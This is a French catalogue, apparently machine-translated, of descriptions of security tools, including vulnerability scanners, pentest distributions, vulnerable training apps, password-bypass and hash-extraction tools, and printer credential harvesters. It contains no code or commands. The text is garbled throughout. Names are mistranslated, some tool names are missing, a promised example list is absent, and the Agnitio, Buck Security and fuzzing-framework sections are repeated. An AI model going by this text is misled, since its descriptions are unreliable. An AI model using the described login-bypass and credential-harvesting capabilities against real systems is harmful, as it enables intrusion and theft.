Scannedonly se décline en deux parties: un module samba vfs (inclus dans samba samba-3.5.0 depuis) ​​et (un ou plusieurs) des démons. Le démon analyse les fichiers. . Si un fichier est propre, un second fichier est créé avec le préfixe numérisées:. Le module samba regarde simplement si une telle numérisées:. Fichier existe et est plus récent que le fichier pertinents. Si tel est le cas, le fichier est affiché à l’utilisateur. Si ce n’est pas le cas, le fichier n’est pas retourné dans toute inscription dans l’annuaire, et ne peut pas être ouvert. Le module samba vfs également dire au démon de scan de ce fichier.

Donc ce qui se passe pour l’utilisateur. La première fois qu’un dossier est listé, il est vide, mais après une première actualisation de tous les fichiers sont affichés. Il ya une scannedonly_prescan utilitaire qui peut vous aider à tous les répertoires de prévisualisation.

Si un virus est détecté par le démon, un fichier avec un message d’avertissement est créé dans le répertoire de l’utilisateur, un avertissement est envoyé aux journaux, et le fichier est renommé pour avoir préfixe virus.:. Les fichiers avec le virus:. Préfixe ne sont jamais montrées à l’utilisateur et tous l’accès est refusé.



Dradis cadre
Dradis est un framework open source pour permettre le partage efficace des informations. Dradis est une application Web autonome qui offre un référentiel centralisé d’informations pour garder une trace de ce qui a été fait jusqu’à présent, et ce qui est encore à venir.


Spiceworks est la gestion complète du réseau et de surveillance, helpdesk, inventaire PC & Logiciels solution de reporting pour gérer tout IT dans les entreprises petites et moyennes.

Spiceworks vous permet de …

* Inventaire de votre réseau et PC
* Surveiller et gérer votre réseau
* Gérer vos actifs informatiques
* Gérer les changements et des configurations
Carte * Votre NetworkBETA
* Audit de votre logiciel
* Résoudre les problèmes de votre réseau
* Exécution d’une IT Help Desk
* Soyez un MSP
Avantages * Parlez-lui Like You

Spiceworks IT Desktop est conçu pour

* Professionnels de l’informatique qui ont des droits admin sur leur réseau.
* Organismes de moins de 500 appareils sur leur réseau. Il travaillera avec plus mais il ne sera pas aussi rapide.
* L’exécution sur un PC. Il découvre Windows, OS X, Linux et Unix, mais vous devez l’exécuter à partir d’un PC sur votre réseau.

Lansweeper: matériel, réseau et logiciel d’inventaire pour les réseaux Windows
Lansweeper est un outil de réseau automatisé de découverte qui scanne tous vos ordinateurs et périphériques et les affiche dans une interface Web accessible facilement.
Il n’est pas nécessaire d’installer des agents sur les ordinateurs, tous les balayage est effectué par la norme construire-dans la fonctionnalité (WMI, SNMP, ssh ,…)

OS Distro

Katana est une suite de sécurité portatif multi-boot conçu pour la plupart de vos besoins de sécurité informatique. L’idée derrière cet outil est de rassembler toutes les distributions meilleure sécurité à courir à partir d’un disque USB. Katana comprend les distributions qui se concentrent sur les tests de pénétration, d’audit, la fissuration de passe, en médecine légale et pots de miel.

formation LAMPSecurity est conçu pour être une série de vunlerable images de machines virtuelles ainsi que des documents complémentaires conçus pour enseigner linux, apache, php, mysql de sécurité.

Le Matriux est un phénomène qui a été en attente de se produire. C’est une distribution de sécurité comprenant toutes les fonctionnalités d’un groupe de puissant, open source et des outils gratuits qui peuvent être utilisés à des fins diverses, y compris, mais sans s’y limiter, des tests de pénétration, ethical hacking, administration système et réseau, la médecine légale cyber enquêtes, des tests de sécurité analyse de la vulnérabilité, et bien plus encore. C’est une distribution conçue pour les passionnés et les professionnels de la sécurité, bien qu’il puisse être utilisé normalement en tant que votre système de bureau par défaut.

Boîte à outils de sécurité réseau
« Le Réseau Security Toolkit (NST) est un ISO bootable live CD / DVD (NST Live) et est basé sur Fedora. La trousse a été conçue pour faciliter l’accès aux best-of-breed Open Source Network Applications de sécurité et devrait fonctionner sur la plupart des plates-formes x86/x86_64. L’objectif principal de développer cette trousse est de fournir à l’administrateur de sécurité réseau avec un ensemble complet d’outils Open Source Network Security. Une interface utilisateur Web de pointe (WUI) est prévu pour l’administration système, la navigation, l’automatisation et la configuration du réseau et applications de sécurité ont trouvé dans la distribution des NST. Dans le monde virtuel, NST peut être utilisé comme une analyse de sécurité réseau, de validation et de suivi sur l’entreprise d’hébergement de serveurs virtuels machines virtuelles. NST fait également un excellent outil pour aider les uns avec les scénarios de reprise sur incident dépannage et le diagnostic.  »

OWASP Web Broken projet Applications
Open Web Application Security Project (OWASP) Broken Applications Web du projet, une collection d’applications web vulnérable qui est distribué sur une machine virtuelle VMware au format compatible avec leur sans frais VMware Player et VMware Server produits (ainsi que leurs produits commerciaux).

Qubes met en œuvre la sécurité par l’approche d’isolement. Pour ce faire, Qubes utilise la technologie de virtualisation, d’être en mesure d’isoler les divers programmes de l’autre, et même sandbox de nombreux éléments au niveau du système, comme sous-système réseau ou de stockage, de sorte que leurs compromis ne portent pas atteinte à l’intégrité du reste de la système.

Qubes permet à l’utilisateur de définir de nombreux domaines de la sécurité mis en place le plus léger de machines virtuelles (VM), ou «AppVMs ». Par exemple, utilisateur peut avoir «personnel», «travail», «shopping», «banque», et «aléatoire» AppVMs et peuvent utiliser les applications de l’intérieur de ces machines virtuelles, tout comme si elles étaient d’exécution sur l’ordinateur local, mais en même temps qu’ils sont bien isolées les unes des autres. Qubes prend en charge la copie-coller et le partage de fichiers entre les AppVMs, bien sûr.

Le Samurai Web Infrastructure de test est un LiveCD axé sur les essais d’applications web. Nous avons recueilli les outils de test du haut et les pré-installés pour créer l’environnement idéal pour tester les applications.

WeakNet Linux
« Un must-have pour quiconque s’intéresse à la sécurité ou la médecine légale, cette distribution de CD-entreprises contient tous les outils dont vous avez besoin de tester vos compétences et d’exceller dans le domaine de l’INFOSEC. » – Johnny Long (

Dojo de sécurité Web
Dojo de sécurité Web
Un logiciel open-source autonome de formation pour les applications Web des tests de pénétration de sécurité. Outils + Objectifs = Dojo
Divers outils web application des tests de sécurité et des applications web vulnérables ont été ajoutés à une installation propre de Ubuntu v9.10.
Le Web Security Dojo est pour apprendre et pratiquer les techniques de web app tests de sécurité. Il est idéal pour les classes de formation et de conférences, car il n’a pas besoin d’une connexion réseau. Le Dojo contient tout le nécessaire pour commencer – outils, des objectifs, et de la documentation.

Pratique image machine virtuelle
(VirtualBox a recommandé, à condition VMware)
Les cibles incluent:

* OWASP WebGoat v5.2
* Damn Vulnerable Web App v1.0.6
* Hacme Casino v1.0
* OWASP InsecureWebApp v1.0
* Les objectifs de formation simple par Maven de sécurité (y compris REST et JSON)


* Burp Suite (version gratuite) v1.3
* W3af version cvs
* OWASP Skavengerv0.6.2a
* V1.0 RC1 OWASP Dirbuster
* Paros v3.2.13
* WebScarab v20070504-1631
* Ratproxy v1.57 beta-
sqlmap * v0.7
* Utiles Firefox add-ons

Kon-Boot est une pièce prototype de logiciel qui permet de modifier le contenu d’un noyau linux (et maintenant aussi le noyau Windows!) À la volée (pendant le démarrage). Dans l’état actuel, il compilation permet de connecter à un système Linux en tant que l’utilisateur «root» sans avoir à taper le mot de passe ou d’élever les privilèges de l’utilisateur actuel à la racine. Pour les systèmes Windows, il permet d’entrer un mot de passe profil protégé, sans aucune connaissance du mot de passe.


Un outil pour aider les développeurs et professionnels de la sécurité d’emploi effectuer des examens code de sécurité d’une manière cohérente et reproductible. Agnitio vise à remplacer la nature ad hoc de la sécurité d’emploi révision du code de la documentation, de créer une piste d’audit et de reporting.


* Le code de sécurité critiques
* Mesures de sécurité l’examen du code et des rapports
* La sécurité des applications code outil d’examen
* Conseils de sécurité statique analyse et de reporting

Buck sécurité
Buck de sécurité est une collection de contrôles de sécurité pour Linux. Il a été conçu pour les serveurs Debian et Ubuntu, mais peut être utile pour n’importe quel système Linux.

Le but de Buck de sécurité est, pour vous permettre d’obtenir un aperçu rapide de l’état de sécurité de votre système. En tant qu’administrateur système linux – mais aussi comme un utilisateur linux normal – on se demande si votre système est sécurisé. Dans cette situation, il est utile d’avoir une overvirew de l’état de sécurité du système immédiatement. Buck de sécurité a été conçu exactement pour cela. Il exécute des tests importants et renvoie les résultats à vous au bout de quelques minutes.

A présent, les tests suivants sont mis en œuvre:

* Recherche de fichiers worldwriteable
* Recherche de répertoires worldwriteable
* Recherche des programmes où le setuid est fixé
* Recherche des programmes où le setgid est fixé
* Vérifier votre umask
* Vérifiez si le sticky-bit est activé pour le répertoire / tmp
* Recherche de super-utilisateurs
* Recherche des outils d’attaque les paquets installés

Cadre CERT Fuzzing de base
La base Fuzzing cadre (BFF) se compose de deux parties principales:

* Une machine virtuelle Linux qui a été optimisé pour fuzzing
* Un ensemble de scripts et un fichier de configuration qui orchestrent la course fuzzing

La machine virtuelle est une installation stripped-down Debian avec les modifications suivantes:

* Le gestionnaire de fenêtre Fluxbox est utilisé à la place de la lourde Gnome ou environnements de bureau KDE.
* Fluxbox est configuré pour ne pas faire ou de se concentrer de nouvelles fenêtres. Cela peut aider dans des situations où vous pourriez avoir besoin pour interagir avec le système d’exploitation invité tout une application GUI est fuzzed.

Un outil pour aider les développeurs et professionnels de la sécurité d’emploi effectuer des examens code de sécurité d’une manière cohérente et reproductible. Agnitio vise à remplacer la nature ad hoc de la sécurité d’emploi révision du code de la documentation, de créer une piste d’audit et de reporting.


* Le code de sécurité critiques
* Mesures de sécurité l’examen du code et des rapports
* La sécurité des applications code outil d’examen
* Conseils de sécurité statique analyse et de reporting

Buck sécurité
Buck de sécurité est une collection de contrôles de sécurité pour Linux. Il a été conçu pour les serveurs Debian et Ubuntu, mais peut être utile pour n’importe quel système Linux.

Le but de Buck de sécurité est, pour vous permettre d’obtenir un aperçu rapide de l’état de sécurité de votre système. En tant qu’administrateur système linux – mais aussi comme un utilisateur linux normal – on se demande si votre système est sécurisé. Dans cette situation, il est utile d’avoir une overvirew de l’état de sécurité du système immédiatement. Buck de sécurité a été conçu exactement pour cela. Il exécute des tests importants et renvoie les résultats à vous au bout de quelques minutes.

A présent, les tests suivants sont mis en œuvre:

* Recherche de fichiers worldwriteable
* Recherche de répertoires worldwriteable
* Recherche des programmes où le setuid est fixé
* Recherche des programmes où le setgid est fixé
* Vérifier votre umask
* Vérifiez si le sticky-bit est activé pour le répertoire / tmp
* Recherche de super-utilisateurs
* Recherche des outils d’attaque les paquets installés

Cadre CERT Fuzzing de base
La base Fuzzing cadre (BFF) se compose de deux parties principales:

* Une machine virtuelle Linux qui a été optimisé pour fuzzing
* Un ensemble de scripts et un fichier de configuration qui orchestrent la course fuzzing

La machine virtuelle est une installation stripped-down Debian avec les modifications suivantes:

* Le gestionnaire de fenêtre Fluxbox est utilisé à la place de la lourde Gnome ou environnements de bureau KDE.
* Fluxbox est configuré pour ne pas faire ou de se concentrer de nouvelles fenêtres. Cela peut aider dans des situations où vous pourriez avoir besoin pour interagir avec le système d’exploitation invité tout une application GUI est fuzzed.
* Mémoire de randomisation est désactivé.
* VMware Tools est installé, qui permet à l’OS invité à partager un répertoire avec l’hôte.
* Le système d’exploitation est configuré pour ouvrir automatiquement une session et commencer à X.
* sudo est configuré pour ne pas demander un mot de passe.
* Bande est un lien symbolique vers / bin / true, ce qui empêche les symboles d’être retirée lorsque l’application est construite.

Le fuzzer utilisé par l’ODR est l’application de zzuf Sam Hocevar. Il a été choisi pour son comportement déterministe, le nombre de fonctionnalités, et la taille légère.

Crunch est un générateur de liste de mots où vous pouvez spécifier un jeu de caractères standard ou un jeu de caractères que vous spécifiez.crise peut générer toutes les combinaisons et permutations possibles.


crunch * génère des listes de mots dans les deux sens combinaisons et permutations
* Il peut produire la rupture par le nombre de lignes ou de taille du fichier
* A maintenant reprendre appui
* modèle prend désormais en charge nombre et symboles
* modèle prend désormais en charge les caractères majuscules et minuscules séparément
* Ajoute un rapport de situation lors de la génération des fichiers multiples

Premièrement ce n’est pas féroce. Fierce n’est pas un scanner IP, ce n’est pas un outil de DDoS, il n’est pas conçu pour analyser l’ensemble d’Internet ou d’effectuer des attaques non ciblées. Il est destiné spécifiquement pour localiser des cibles probables à l’intérieur et l’extérieur d’un réseau d’entreprise. Seuls les objectifs sont énumérés (à moins que le commutateur nopattern-est utilisé). Aucune exploitation est effectuée (sauf si vous faites quelque chose intentionnellement malveillants communiquer avec le commutateur-). Fierce est un outil de reconnaissance. Fierce est un script Perl qui scanne rapidement domaines (généralement en quelques minutes, en supposant qu’aucun lag réseau) en utilisant plusieurs tactiques.

HashGrab2 monte automatiquement tous les lecteurs Windows, il peut trouver, et en utilisant des extraits samdump2 hachages nom d’utilisateur-mot de passe de SAM et SYSTEM fichiers situés sur le lecteur Windows, après quoi il les écrit dans le répertoire d’utilisateur spécifié.

Jarlsberg est une collection de codes, qui montre comment les vulnérabilités des applications Web peuvent être exploitées et comment se défendre contre ces attaques. Il peut vous apprendre à attaquer une application en utilisant les failles de sécurité commune web, comme cross-site vulnérabilités scripting (XSS) et la falsification de Cross-Site Request (XSRF). Il peut aussi vous apprendre à trouver, réparer, et éviter ces vulnérabilités communes et d’autres bugs qui ont un impact sur la sécurité, telles que le déni de service, la divulgation d’informations, injection SQL, attaques de phishing navigateur ou l’exécution de code à distance. En d’autres termes, il enseigne d’abord comment vous le piratage des œuvres, puis il vous permet de lui-même attaquer avec ces attaques! C’est ainsi que les mains sur l’apprentissage devrait être!

Google aime à décrire comme Jarlsberg une application web de fromage qui a été intentionnellement construit avec un certain nombre de vulnérabilités. Le seul pré-requis est que vous devez avoir une connaissance globale de fonctionnement d’une application Web et une certaine connaissance de HTML, des modèles, des biscuits, AJAX, Python (car il est écrit en Python), etc Vous jouez le rôle d’un hacker dans ce test. Il vous donne une brève description sur une vulnérabilité et puis vous avez la tâche d’exploiter cette vulnérabilité! Aussi simple que ça! Vous êtes autorisé à utiliser vos outils favoris tels que Burp Proxy, Fiddler, Watcher, etc dans vos efforts.

Metagoofil est un outil de collecte d’information conçu pour extraire les métadonnées des documents publics (pdf, doc, xls, ppt, odp, ods) disponibles dans la cible de sites Web aux victimes.

Il va générer une page html avec les résultats des méta-données extraites, ainsi qu’une liste de noms d’utilisateurs potentiels très utile pour préparer une attaque bruteforce sur les services ouverts comme ftp, pop3, applications web, VPN, etc En outre, il sera extrait de la liste des communiqués chemins dans les métadonnées, avec cette information, vous pouvez le deviner OS, les noms de réseau, partage des ressources, etc

Cette nouvelle version extraits adresse MAC à partir de documents Microsoft Office. Maintenant vous pouvez avoir une idée de quel type de matériel qu’ils utilisent.

Toutes ces informations ne devraient pas être disponibles sur le net, mais la plupart des entreprises ne disposent pas de politiques sur la fuite d’informations … et la plupart d’entre eux ne connaissent pas cette information existe. Ainsi, vous pouvez leur montrer quelles sont les informations à un attaquant peut obtenir, avec cette technique simple.

RSMangler aura une liste de mots et d’effectuer diverses manipulations sur les analogues à ceux effectués par John the Ripper avec quelques extras.
La principale nouveauté est le mode de permutations qui prend chaque mot dans la liste et il se combine avec les autres pour produire toutes les permutations possibles (pas de combinaisons, pour les questions). Par exemple, le freds mots, poisson frais, va produire la liste suivante:


Chacun de ces nouveaux mots est ensuite soumis à la calandres d’autres, à cause de cela, nous recommandons fortement avec le mode de permutations activé (par défaut) que vous utilisez une liste de mots très faible, 3 mots commencent créer une liste finale contenant 4245 mots et 5 mots commencent crée une liste contenant 91975. En test, nous avons essayé avec quelques centaines de mots et a abandonné lorsque le fichier de sortie obtenu à la 3G.

VIDigger est un outil conçu pour aider les administrateurs de l’infrastructure virtuelle VMware durcir leur environnement. Bien que la technologie de base de VMware est conçu pour être sécurisé, il ya de nombreux paramètres de configuration et de déploiement des considérations qui peuvent gravement affecter la sécurité globale du déploiement de l’infrastructure virtuelle. VIDigger est conçu pour aider les administrateurs à vérifier la configuration du serveur ESX et les machines virtuelles hébergées sur le serveur ESX contre le guide VMware Infrastructure de trempe et d’autres pratiques exemplaires.

VIDigger permettra de récupérer les données de configuration sur les machines hôtes et virtuels, puis de remettre un rapport personnalisable de domaines problématiques à l’administrateur Virtual. VIDigger est destiné à être utilisé tout au long du cycle de vie du déploiement à la fois comme un outil de durcissement et un outil de suivi des modifications des paramètres de configuration qui apporte des changements à l’attention de l’administrateur. L’outil axé sur les changements qui peuvent influer sur la sécurité globale de l’hôte ESX ou d’une machine virtuelle (s) déployé sur le serveur ESX.

Une des caractéristiques les plus intéressantes de VIDigger est qu’il peut être étendu pour ajouter de nouveaux contrôles que de nouveaux composants sont ajoutés à l’infrastructure virtuelle pas actuellement analysés par l’outil.

Vicnum est une application Web flexible et vulnérables qui démontre des problèmes communs de sécurité Web, tels que par cross site scripting, injections SQL, et les questions de gestion de session. Le programme est particulièrement utile pour vérificateurs en TI de perfectionner leurs compétences de sécurité Web et la création de « capture du drapeau » des exercices de type.

Etre une petite application web sans cadre complexes qui se posent, Vicnum peut facilement être invoquée et adaptés pour répondre à un besoin spécifique. Par exemple, si une application de test vulnérables est nécessaire dans l’évaluation d’un scanner de sécurité Internet ou un pare-feu d’applications Web, vous pouvez contrôler une application Web cible pour voir ce que le scanner peut trouver et ce que le pare-feu peut protéger.

Finalement, l’objectif majeur de ce projet est de renforcer la sécurité des applications web en éduquant les différents groupes (étudiants, la gestion, les utilisateurs, les développeurs, les vérificateurs) quant à ce qui pourrait mal se passer dans une application web. Et bien sûr, c’est OK pour s’amuser un peu.

Le vérificateur de sécurité assistante de recherche (LEP) est un réseau de troisième génération analyse de la sécurité outil qui a été disponible et activement mis à jour depuis plus de 10 ans.Malheureusement, toutes les bonnes choses doivent venir à sa fin et il en va de la LEP. SARA 7.9.1 est notre dernière version. En fait, la LEP 7.9.2a est la version finale.


1. Fonctionne sous Unix, Linux, MAC OS / X ou Windows (par coLinux) OS.
2. Intègre la base de données nationales sur la vulnérabilité (NVD).
3. Effectuer des essais d’injection SQL.
4. Effectuer des tests exhaustifs XSS
5. Peut s’adapter à de nombreux environnements de pare-feu.
6. Support à distance de soi et des installations de numérisation API.
7. Utilisé pour la CEI initiatives de référence
8. Plug-in installation pour les applications de tiers
9. normes CVE soutien
10. module de recherche d’entreprise
11. Autonome ou en mode daemon
12. Free-utilisation ouverte SATAN licence orientée

Le but de Xplico est extrait d’un trafic Internet de saisir les données des applications contenues.
Par exemple, à partir d’un fichier pcap Xplico extraits de chaque e-mail (POP, IMAP et SMTP), tous les contenus HTTP, chaque appel VoIP (SIP), FTP, TFTP, et ainsi de suite. Xplico n’est pas un analyseur de protocole réseau. Xplico est une source ouverte Network Forensic Analysis Tool (NFAT).


CHScanner est un ARP, IPv4 et IPv6 scanner réseau avec 31 méthodes de numérisation: il scanne les ports ouverts, des protocoles, informations NetBIOS et les parts de Windows, les informations SNMP et WMI (WBEM) d’information. Il ont également la possibilité d’activer (en utilisant le Wake-On-LAN) et à l’arrêt ou le redémarrage d’un hôte distant Windows. Caractéristiques automatique (scriptable) mode de fonctionnement, un mode de chasse, un mode passif et le mode de balayage normal.

Certains détails

Les principales différences entre CHScanner et d’autres outils similaires sont:

CHScanner * utiliser un système d’exploitation Mimic technologie;
* CHScanner a beaucoup plus de méthodes de balayage par rapport à beaucoup d’autres scanners, à partir de la couche 2 du modèle OSI. Il ne scanne seulement les adresses IPv4, elle utilise aussi ARP, IGMP, IPv6 et certains protocoles de niveau supérieur comme NetBIOS, SNMP et WMI;
* Il est très flexible, la numérisation se fait sur la base des fichiers de configuration utilisateur défini, et assez rapide;
* Outre l’interface skinnable graphique, CHScanner peut être utilisé en ligne de commande pour automatiser les scans.

Modes de numérisation

* Le mode Normal: c’est le mode commun utilisé par la plupart des scanners aujourd’hui,
* Le mode passif: dans ce mode NO paquet est envoyé, CHScanner seulement d’écouter le trafic réseau et décode les paquets reçus, semblable à un sniffer;
* Mode Hunt: introduit avec la version, dans ce mode CHScanner va scanner tout hôte qui tente de communiquer avec la machine hôte. Le balayage est déclenché par l’un a reçu des paquets suivants destinés à la machine locale: requête ARP, ICMP Echo Request, TCP SYN.

En utilisant les données de géolocalisation fournies par MaxMind vous pouvez trouver le pays associé à une adresse IPv4 spécifiques;

* Automatique, scriptable, mode: si l’instruction de sorte, par des paramètres de ligne de commande, CHScanner va faire son travail basé sur le fichier de configuration fourni comme l’un des paramètres, sauvegarder le résultat et fermer.

Système d’exploitation Mimic brève description de la technologie

Fondamentalement, cela signifie que les paquets envoyés émule le comportement des différents systèmes d’exploitation et / ou de leurs outils natifs (où est le cas). Actuellement, il émule les suivantes:

* Windows XP Professionnel SP2
* Windows Server 2003
* Linux noyau 2.4 (Adamantix base)
* 2.6 du noyau Linux (Fedora Core base)
* Solaris 8
* OpenSolaris (Nevada 35)

Il ya aussi un « random » mode où les paquets sont les données d’identification aléatoire généré. Le Solaris 8 émulation ne peut être poursuivi et d’émulation pour OpenSolaris (Nevada 35) peut être ajouté.

Cet outil agit comme un sniffer réseau Ethernet standard. Toutefois, contrairement à un paquet sniffer traditionnels ne pas tenter de capturer et de décoder l’ensemble du trafic, mais est plutôt orientée vers la découverte de l’infrastructure et des données utiles liées à la sécurité du réseau, souvent de la circulation n’est pas envoyé vers ou depuis le réseau du système hôte à savoir diffusion générale la circulation. Ces données peuvent révéler toutes sortes d’informations utiles, allant des systèmes en direct sur le réseau, les noms d’hôtes, des systèmes IPv6, les routeurs et les serveurs de noms, noms d’utilisateur et mots de passe.

exigences de l’outil

CSniffer fonctionne sur les systèmes Microsoft Windows (Windows 2000 vers le haut) et tente de renifler les données réseau en mode promiscuous. Il peut utiliser une des deux méthodes pour y parvenir:

– Utilisation de Windows « Built-in raw sockets API (par défaut).
– Utiliser le gestionnaire de paquet WinPcap.


Outre les exigences précitées de fonctionner sous un compte de niveau administrateur, il existe certaines limitations sévères lors de l’utilisation intégrée dans Windows sockets mode brut.

Les premières prises de Microsoft API a plusieurs restrictions qui ont été introduites au fil des années dans un effort pour réduire les risques de sécurité associés à l’accès à faible niveau des paquets réseau.Selon la plate-forme que vous utilisez sur vous pouvez constater que vous êtes limités dans ce que les données peuvent être vus sur le réseau. Une liste complète de toutes les limites connues vu sur différents systèmes d’exploitation Windows et les niveaux de service pack de ces systèmes d’exploitation n’a pas été compilée, mais voici quelques problèmes connus. Encore une fois, cela ne s’applique qu’à Windows sockets mode brut.

– Sortant UDP et ICMP ne sont pas capturés (OS, spécifiques SP).
– Sur Windows XP SP1, XP SP3 et Vista ne paquets sortants de toute nature sont capturés.
– Sous Windows Vista avec SP1, seuls les paquets UDP sont capturés.paquets TCP ne sont pas capturés.

Flint examine les pare-feu, calcule rapidement l’effet de toutes les règles de configuration, puis des taches tant de problèmes, vous pouvez:

* CLEAN UP CONFIGURATIONS RUSTY qui sont crudded avec des règles qui ne peuvent pas correspondre à la circulation.
* ÉLIMINER LATENTE PROBLEMES DE SECURITE tapi dans des règles trop permissives
* SANITY Vérifier les modifications pour voir si de nouvelles règles de créer des problèmes.

Pourquoi vous avez besoin Flint

Vous avez plusieurs pare-feu protégeant les réseaux internes de l’Internet et de contrôler l’accès aux données des clients. Votre entreprise change, et ainsi de faire votre pare-feu, et pas toujours dans le même temps. Pare-feu peuvent sortir de l’étape avec les politiques.

Tout le monde fait des erreurs. Pour comprendre une configuration de pare-feu, vous devez lire des centaines de lignes de configuration, puis vous devez penser comme un pare-feu ne. Les gens ne sont pas bonnes à penser comme les pare-feu. Ainsi, la plupart des pare-feu sont truffées de fautes subtiles. Certaines de ces erreurs peuvent coûter cher:

* L’INSÉCURITÉ SERVICES pourrait être autorisé à traverser le pare-feu, l’empêchant de bloquer les attaques.
* Contrôle laxiste des DMZ peut exposer les serveurs de préparation et de test.
* FIREWALL ports de gestion peuvent être exposés à des réseaux non sécurisés.
* REDONDANT règles pare-feu peut être compliqué votre configuration et vous ralentir.

Qu’est-ce qu’on peut faire avec Flint

Vérifier les règles avant son déploiement dans LES Flint empêche ingénieurs de faire des erreurs coûteuses. Il faut quelques instants pour Flint pour évaluer un ensemble de règles et erreurs place. Votre équipe peut-elle et en quelques minutes. Flint est faible traînée, pas de drame.

CLEAN UP Ensembles de règles RUSTY Flint ne le dur travail de décapage des règles de pare-feu pour crud inutiles, économiser du temps et permet à votre équipe de se concentrer sur des problèmes d’ingénierie qui importent vraiment. Flint pouvez repérer les règles redondantes et contradictoires, et Flint, il est plus facile de détecter les problèmes au niveau des entreprises.

COMPREHEND configurations complexes Flint ne suffit de cocher les pare-feu pour les problèmes. Il a également comprend parfaitement le sens des lignes de configuration, et les décompose pour vous par service ou par l’interface, de sorte que vous pouvez voir en un coup d’oeil ce que n’importe quel pare-feu donnée est fait.
Comment obtenir Flint

Flint est distribué sous forme de source. Il est mis en œuvre dans le rubis.

Analyseur Microsoft surface d’attaque # Présentation
La surface d’attaque Analyzer est le même outil utilisé par les équipes de Microsoft du produit intérieur aux changements catalogue apportées au système d’exploitation de l’installation de nouveaux logiciels.

Analyseur de la surface d’attaque prend un instantané de votre état du système avant et après l’installation du produit (s) et affiche les changements à un certain nombre d’éléments clés de la surface d’attaque de Windows.

Ceci permet:
– Les développeurs de visualiser les changements de la surface d’attaque résultant de l’introduction de leur code sur la plate-forme Windows
– Les professionnels pour évaluer la surface d’attaque globale changement par l’installation de la ligne de l’organisation des applications d’entreprise
– IT comptes de sécurité d’évaluer le risque d’un morceau particulier de logiciel installé sur la plate-forme Windows au cours des examens du risque de menace
– IT Security Incident intervenants d’acquérir une meilleure compréhension de l’état d’un des systèmes de sécurité au cours des enquêtes (si un scanner de base a été prise du système au cours de la phase de déploiement)

Microsoft Baseline Security Analyzer
Le Microsoft Baseline Security Analyzer fournit une méthode rationalisée pour identifier les mises à jour de sécurité manquantes et les erreurs de configuration de sécurité commune. MBSA 2.1.1 est une mise à jour mineure pour ajouter le support pour Windows 7 et Windows Server 2008 R2.

Le scanner de vulnérabilité Nessus ® est le leader mondial de scanners active, avec la découverte à grande vitesse, la vérification de configuration, le profilage d’actifs, la découverte des données sensibles et analyse de la vulnérabilité de votre posture de sécurité.Nessus scanners peuvent être distribués dans toute l’entreprise, à l’intérieur DMZ et à travers les réseaux physiquement séparés.

Netbios Actions scanner a été développé par SecPoint. L’outil analyse une adresse IP et tente de récupérer les disques partagés et de leur contenu. Il travaille pour les postes de travail Windows / serveurs ainsi que pour les boîtes Linux (smbclient utilisé pour la connexion).

Wordpress doigt imprimante outil de recherche et de récupérer des informations sur les versions des plugins installés dans les systèmes de WordPress.

Il peut analyser une URL unique ou d’effectuer une analyse fondée sur les résultats indexés par Google. En outre affiche CVE code associé à chaque plugin, si.


En tirant parti de sécurité de l’imprimante pauvres et vulnérables au cours de tests de pénétration, nous sommes en mesure de récolter une mine d’informations à partir de périphériques MFP y compris les noms d’utilisateurs, adresses e-mail, carnet d’adresses des utilisateurs, y compris les informations d’authentification SMB, Email, mots de passe LDAP, etc Parfois, ils pourraient aussi vous aider dans la récupération à distance de gravures, de fax, de numérisation des copies! Certaines installations imprimante peut également vous permettre d’accéder à l’interface HTTP, et de faire une copie de configuration! Cela pourrait vous permettre de continuer à voir les entrailles! En bref, praeda est conçu pour automatiser une partie de la collecte d’informations provenant des appareils de réseau à travers des interfaces web de gestion tels que les imprimantes et les appareils du réseau.

Cet outil open source est programmé en Perl et dispose de plusieurs modules qui portent sur près de 28 appareils en tout! Le module à utiliser est énuméré des différents modèles d’imprimantes utilisant des «Page de titre» et «Type de serveur » les réponses de la page de gestion d’imprimante.

Ses modules Perl nécessaires sont:

LWP:: Simple
LWP:: UserAgent
HTML:: TagParser
URI:: Fetch
HTTP:: Cookies

Exemple de syntaxe: TARGET_FILE TCP_PORT PROJECT_NAME fichier_sortie

RIPS est un analyseur statique de code source pour les vulnérabilités dans PHP webapplications.

RIPS automatise le processus d’identification des failles de sécurité potentielles dans le code source PHP en utilisant d’analyse statique de code source.

Caractéristiques du RIPS:
– Détecter les XSS, SQLI, Dossier d’information, LFI / RFI, vulnérabilités RCE et plus
– 5 niveaux de verbosité pour le débogage de votre analyse des résultats
– Marquer les lignes vulnérables dans la visionneuse de code source
– Code de la fonction définie par l’utilisateur par passage de la souris sur appel détecté
– La liste de toutes les fonctions définies par l’utilisateur et les points d’entrée du programme – (entrée de l’utilisateur) relié à la visionneuse de code source
– Créer des exploits CURL pour les vulnérabilités détectées en quelques clics
– 7 syntaxe différente soulignant schéma de couleur
– La seule exigence minimale est un serveur web local avec PHP et d’un navigateur

Outil pour déclenche automatiquement des balayages de sécurité réguliers avec Nessus. Comparer les résultats de l’analyse en cours avec l’analyse précédente et rapport sur le delta, dans une interface web. L’objectif principal de l’outil est de faire des balayages répétés plus efficace

Entièrement automatisé, l’application web de reconnaissance active outil de sécurité. Principales caractéristiques:

* Grande vitesse: le code C pure, hautement optimisé la gestion HTTP, empreinte minimale du CPU – facilement atteindre 2000 requêtes par seconde avec des objectifs adaptés.

* Facilité d’utilisation: heuristiques pour soutenir une variété de cadres web originaux et sites à technologie mixte, avec des capacités d’apprentissage automatique, sur la volée création liste de mots, et l’autocomplétion forme.

* Logique de sécurité de pointe: de haute qualité, faible de faux positifs, les contrôles de sécurité différentiel, capable de repérer une série de défauts subtils, y compris les vecteurs d’injection aveugles.

L’outil est considéré comme le support de Linux, FreeBSD, MacOS X et Windows (Cygwin) environnements.

SoftPerfect Network Scanner
SoftPerfect Network Scanner est un logiciel gratuit IP multi-thread, NetBIOS et SNMP scanner avec une interface moderne et de nombreuses fonctionnalités avancées. Il est destiné aux administrateurs système et les utilisateurs en général intéressés par la sécurité informatique. Les pings programme ordinateurs, analyse pour l’écoute des ports TCP / UDP et affiche les types de ressources sont partagées sur le réseau (y compris le système et cachés).

En outre, il vous permet de monter les dossiers partagés comme des lecteurs réseau, parcourir avec l’Explorateur Windows, filtrer la liste des résultats et plus encore. SoftPerfect Network Scanner peut aussi vérifier un port défini par l’utilisateur et de rendre compte si l’on est ouvert. Elle peut aussi résoudre les noms d’hôte et auto-détecter votre portée locale et IP externe. Il prend en charge l’arrêt à distance et de Wake-On-LAN.

Principales caractéristiques

* Pings ordinateurs et affiche ceux qui sont vivants.
* Détecte les adresses MAC du matériel, même à travers des routeurs.
* Détecte les dossiers cachés partagés et ceux en écriture.
* Détecte votre internes et externes des adresses IP.
* Scans pour écouter les ports TCP, UDP et certains services SNMP.
